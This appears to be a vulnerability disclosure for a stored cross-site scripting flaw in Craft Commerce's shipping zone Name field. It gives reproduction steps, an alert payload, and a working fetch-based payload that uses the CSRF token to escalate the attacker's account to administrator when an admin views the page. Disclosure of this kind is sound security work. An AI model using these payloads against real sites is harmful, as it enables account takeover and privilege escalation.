Summary

Proof of Concept

Requirments

• General permissions:
  • Access the control panel
  • Access Craft Commerce
• Craft Commerce permissions:
  • Manage store settings
  • Manage shipping
• An active administrator elevated session

Steps to Reproduce

1. Log in to the Admin Panel with the attacker account with the permissions mentioned above.
2. Navigate to Commerce -> Store Management -> Shipping Zones (/admin/commerce/store-management/primary/shippingzones).
3. Create a new shipping zone.
4. In the Name field, enter the following payload:

<img src=x onerror="alert(document.domain)">

4. Click Save & Go back to the previous page.
5. Notice the alert proving JavaScript execution.

Privilege Escalation to Administrator:

1. Do the same steps above, but replace the payload with a malicious one.
2. The following payload elevates the attacker’s account to Admin if there’s already an elevated session, replace the <UserID> with the attacker id:

<img src=x onerror="fetch('/admin/users/<UserID>/permissions',{method:'POST',body:`CRAFT CSRF TOKEN=${Craft.csrfTokenValue}&userId=<UserID>&admin=1&action=users/save-permissions`,headers:{'content-type':'application/x-www-form-urlencoded'}})">

3. In another browser, log in as an admin & go to the vulnerable page (shipping zones page).
4. Go back to the attacker account & notice it is now an admin.

Resources: